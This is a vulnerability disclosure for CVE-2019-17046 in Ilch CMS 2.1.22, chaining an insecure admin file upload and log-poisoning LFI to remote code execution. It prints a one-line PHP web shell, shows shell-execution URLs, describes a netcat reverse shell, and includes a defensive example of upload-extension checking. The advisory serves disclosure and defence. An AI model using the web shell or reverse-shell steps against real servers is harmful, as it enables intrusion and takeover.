[CVE-2019-17046] Ilch – Content Management System V – 2.1.22 Insecure File Upload, LFI & Remote Code Execution Critical Vulnerability disclosure

Product Owner: Ilch – Content Management System

CVE ID – CVE-2019-17046 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17046 )

Type:  Installable/Customer-Controlled Application

Application Name: ilchCMS 2.1.22

Severity: Critical

Authentication: Required

Complexity: Complex

Vulnerability Name: Insecure File Upload and Local File Inclusion to Remote Code Execution – Ilch CMS Admin Modules

Vulnerability Explanation: 

Browsers Verified In:

Firefox 68.0.2 (64-bit)

Impact:

Local File Inclusion – aka LFI – is one of the most common web application vulnerabilities. If exploited successfully, it can allow attackers to read sensitive information, access configuration files or even execute system commands remotely.

An application is vulnerable whenever a developer passes user-supplied input to an include function without validating it. An attacker can easily exploit such a mistake. The attacker's main goals would be:

  • In-depth information gathering (user enumeration, sensitive files, credentials and more).
  • A reverse shell on the target machine.

Log Poisoning:

Log poisoning is a common technique used to turn an LFI vulnerability into a reverse shell. To make it work, an attacker attempts to inject malicious input into the server log.

Because the PHP statement “include” also evaluates what it loads, an included malformed file is evaluated too. If we control the contents of a file reachable by the vulnerable web application, we can insert PHP code into it and load that file through the LFI vulnerability to execute our code. Such injections typically target the server log files, for example the Apache error log and access log.

PHP info:

As shown, we were able to load the PHPInfo file, meaning that our code was executed. Let’s now attempt to execute the proper commands and receive a reverse shell from the target machine.

The following PHP one-liner payload was used to execute system commands:

<?php echo shell_exec($_GET['e'].' 2>&1'); ?>

LFI: Local File Inclusion using insecure file upload

Insecure file upload – the administrator can add the .php extension to the allowed file list (Media module -> Settings -> Allowed File -> php).

url : http://localhost/cms/Ilch-v2.1.22/index.php/admin/media/settings/index
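The root cause of the upload step above is that the extension check trusts an administrator-editable allow-list, so once php is added a shell is accepted and stored inside a web-served directory. As an added example, not Ilch's own code, the following PHP contrasts such a check with a hardened one that refuses server-executable extensions regardless of configuration; the function name, the settings array and the extension list are assumptions for illustration.

```php
<?php
// Added example (not Ilch code). $allowedFromSettings stands in for whatever
// the administrator configured under Media -> Settings -> Allowed File.
declare(strict_types=1);

// Extensions the web server may execute; never accepted even when an
// administrator adds them to the allow-list (the weakness in the advisory).
const EXECUTABLE_EXTENSIONS = [
    'php', 'php3', 'php4', 'php5', 'php7', 'phps', 'phtml', 'phar',
    'htaccess', 'htpasswd', 'cgi', 'pl', 'py', 'jsp', 'asp', 'aspx', 'sh',
];

// Weak variant: trusts the configured allow-list outright, so with 'php'
// in the list a file such as testshell.php passes the check.
function isAllowedWeak(string $filename, array $allowedFromSettings): bool
{
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return in_array($ext, array_map('strtolower', $allowedFromSettings), true);
}

// Hardened variant: the allow-list is still honoured, but executable
// extensions are refused however the settings look, and every dot-separated
// segment is inspected so names like photo.php.jpg or shell.php. are rejected
// on servers that map inner extensions to a handler.
function isAllowedHardened(string $filename, array $allowedFromSettings): bool
{
    // Drop directory components and trailing dots/whitespace/NUL bytes.
    $base = rtrim(basename(str_replace('\\', '/', $filename)), ". \t\r\n\0");
    if ($base === '' || $base[0] === '.' || strpos($base, "\0") !== false) {
        return false;
    }
    $parts = array_map('strtolower', explode('.', $base));
    if (count($parts) < 2) {
        return false; // no extension at all: refuse rather than guess
    }
    foreach (array_slice($parts, 1) as $segment) {
        if (in_array($segment, EXECUTABLE_EXTENSIONS, true)) {
            return false; // executable extension anywhere in the name
        }
    }
    $allowed = array_diff(array_map('strtolower', $allowedFromSettings), EXECUTABLE_EXTENSIONS);
    return in_array(end($parts), $allowed, true);
}

// Constructed demonstration: 'php' added to the allow-list as in the advisory.
$settings = ['jpg', 'png', 'gif', 'php'];
var_dump(isAllowedWeak('5d9122c079bc3testshell.php', $settings));
var_dump(isAllowedHardened('5d9122c079bc3testshell.php', $settings));
var_dump(isAllowedHardened('photo.php.jpg', $settings));
var_dump(isAllowedHardened('photo.jpg', $settings));
```

Even with this check in place, the upload directory should be served with script execution disabled so that a future configuration mistake cannot turn an upload into code execution.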

Shell.php

url: http://localhost/cms/Ilch-v2.1.22/application/modules/media/static/upload/5d9122c079bc3testshell.php?e=whoami

ipconfig:

url: http://localhost/cms/Ilch-v2.1.22/application/modules/media/static/upload/5d9122c079bc3testshell.php?e=ipconfig

Reverse shell:

Using netcat as the listener, we can receive a reverse shell.

Reverse shell payload used:

Payload – https://github.com/Dhayalanb/windows-php-reverse-shell.git

Remote Code Execution: remote code execution is the ability of an attacker to run code on someone else’s computing device and make changes to it, regardless of where the device is geographically located.

By listening on port 1234 we can see that an admin shell has been received.

Affected URLs:

http://localhost/cms/Ilch-v2.1.22/index.php/admin/media/settings/index

http://localhost/cms/Ilch-v2.1.22/index.php/admin/media/index/index

InSecure File to LFI to RCE – Ilch CMS – V 2.1.22

Twitter – https://twitter.com/the_pr0fess0r_

Nickname: 4n4nd
